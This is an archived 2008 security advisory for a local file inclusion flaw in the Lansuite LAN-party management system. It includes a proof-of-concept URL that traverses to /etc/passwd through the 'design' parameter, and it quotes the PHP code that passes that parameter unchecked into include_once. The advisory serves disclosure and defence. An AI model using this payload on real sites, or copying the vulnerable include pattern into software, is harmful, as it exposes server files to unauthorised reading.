Lucene search
K

lansuite-lfi.txt

🗓️ 25 Sep 2008 00:00:00Reported by dunType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

lansuite <= 3.4 beta r1363 Local File Inclusion Vulnerability "Lansuite - Webbased LAN-Party Management System

Code
` :::::::-. ... ::::::. :::.  
;;, `';, ;; ;;;`;;;;, `;;;  
`[[ [[[[' [[[ [[[[[. '[[  
$$, $$$$ $$$ $$$ "Y$c$$  
888_,o8P'88 .d888 888 Y88  
MMMMP"` "YmmMMMM"" MMM YM  
  
[ Discovered by dun \ dun[at]strcpy.pl ]  
  
##########################################################################  
# [ lansuite <= 3.4 beta r1363 ] Local File Inclusion Vulnerability #  
##########################################################################  
#  
# Script: "Lansuite - Webbased LAN-Party Management System"  
#  
# Script site: http://lansuite.orgapage.de  
# Download: http://sourceforge.net/project/showfiles.php?group_id=105885  
#  
# Vuln:   
# http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00  
#   
#  
# Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254)  
#  
# ...  
# if (!$auth["design"]) $auth["design"] = "simple";  
# if (!file_exists("design/{$auth["design"]}/templates/index.php")) $auth["design"] = "simple";  
# $_SESSION["auth"]["design"] = $auth["design"];  
# if ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design']; // [1]  
#  
# // Statistic Functions (for generating server- and usage-statistics)  
# if ($db->success) $stats = new stats();  
#  
# // Boxes  
# if (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once("modules/boxes/class_boxes.php");  
#  
# if ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); // [2] LFI  
# ...   
#  
#  
###############################################  
# Greetz: D3m0n_DE * str0ke * and otherz..  
###############################################  
  
[ dun / 2008 ]   
  
*******************************************************************************************  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation